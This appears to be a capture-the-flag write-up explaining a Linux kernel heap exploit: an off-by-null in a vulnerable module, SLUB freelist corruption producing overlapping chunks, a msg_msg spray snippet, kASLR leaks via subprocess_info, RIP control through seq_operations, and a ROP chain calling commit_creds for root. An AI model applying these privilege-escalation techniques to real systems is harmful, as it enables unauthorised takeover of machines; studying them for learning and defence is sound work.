Looking at the decompiled module we can notice we are able to interact with it via ioctl, and it allows 3 commands that basically do the following things:
Allocate exactly one chunk with a maximum size of 0x80
Delete the chunk if it's allocated
Edit the chunk if it's allocated
Read the data in the chunk
Off-by-null
If we look at the following line closely:
*(_BYTE *)(note + note_size) =0
We can see that it appends a 0 to the end of the data added to the chunk. The problem with this code is that it doesn't consider that the data may be filling the chunk entirely, for example, if we have a 0x20 bytes allocated chunk and write 0x20 A's to it (or simply provide 0x20 as the size), the nullbyte appended at the end will be the 0x21st byte, overflowing into the next chunk.
SLUB is the default allocator the linux kernel uses, and it works very differently to ptmalloc2 (default glibc allocator). SLUB chunks don't need to carry their sizes since the chunks are allocated in separate regions according to their sizes, and those regions are called SLABs, each slab carries chunks with sizes within a given range (0x20, 0x40, 0x60, 0x80...).
SLUB slabs have freelists that are linked lists of all free chunks on a slab and each node have an fd pointer that points to the next free slab, in a similar way to how userland freelists work.
That being said, imagine we have a 0x80 slab free chunk at the address 0xdead00, this means the next chunk (pointed by it's fd pointer) is at 0xdead80.
As long as the fd pointer of the 0xdead00 chunk remains intact, the next allocation will be allocated at 0xdead00 and the one after that will be allocated at 0xdead80.
So let's say we used our off-by-null bug right now.
If we overwrite the LSB of the fd pointer of the 0xdead00 chunk, it will now point to itself, which will change the allocation flow, so the next allocation will be allocated at 0xdead00 and the one after that will be allocated at 0xdead00 again. This allow us to have two chunks overlaping each other in the exact same location in memory.
Heap spray
/* msg_msg spray 0x80 slab */open_msg(); msgbuf.mtype =1;memset(msgbuf.mtext,"A",sizeof(msgbuf.mtext));for (int i =0; i <0x21; i++){msgsnd(qid,&msgbuf,sizeof(msgbuf.mtext) -0x30,0); }
So far we already know that if we allocate above a chunk that has 0x00 as LSB we can make it self-reference, triggering the overlap, but how do we get it to end up there in the first place?
Heap spray is the answer.
If we keep spamming allocations in the same SLAB as we want to corrupt we will push down the location where our allocated chunk will end up.
The module only allows us to allocate 1 chunk, so will have to appeal to other kernel objects that can be allocated from userland. For the 0x80 slab we can use the msg_msg object.
Abusing kernel structures
The vulnerable module only allows us to allocate one chunk, and this one chunk does not contain any important structures or pointers, making it a really bad victim candidate.
In userland each process has it's own separate heap, but in kernelland there is only one heap and any allocation from any module, syscall or whatever activity that happens in the kernel and needs to allocate in the heap, goes all in one place. That means we can use some other kernel structure as the victim for the overlap. For example, if we trigger the allocation of a chunk with a kernel pointer to abuse with our overlap, we can defeat kASLR and if we overlap over a chunk with a function pointer that will be called we can control RIP. Here is some awesome references on which kernel structures we can use to aid our exploitation:
Our overlap will be composed of two chunks, a controllable chunk which is the one allocated by the module to which we can read/write whatever we want, and a victim chunk, which contains important data that we want to mess with.
In order to leak the kernel base and defeat kASLR I decided to overlap with a subprocess_info object in the 0x80 slab. This can be done simply by calling:
socket(22, AF_INET,0);
Which will trigger a subprocess_info object to be allocated in the heap.
If we check it's definition, we can see we can use the second qword to leak a heap pointer and the fourth qword to leak a kernel base pointer.
The process to control RIP was very similar to what we just did, but instead of having subprocess_info as ther victim we will target seq_operations since it contains a function pointer that will be called when we call read(). This structures lives on the 0x20 slab so I had to use a different spray, I ended up using seq_operations for both the spray and the overlap.
After having control of RIP, our best shot is to do a ROP chain, but notice, in kernel exploitation if you already have a shell it's completely useless to call something like system("/bin/sh"). Our real goal is to call commit_creds(prepare_kernel_cred(0)) and swap the context to userland with our original userland registers and then pop a shell. I'm currently on the heap, not on the stack, so I can but I rop chain here since it won't return to the chain after the first gadget. One way to work around this issue is to use a gadget that moves rsp to an address, then mmap a region containing that address, basically creating as fake stack frame where we can store our rop chain.
Notice that we need our userland registers in order to swap the context back to userland so we need to back up those and then use them in our rop chain.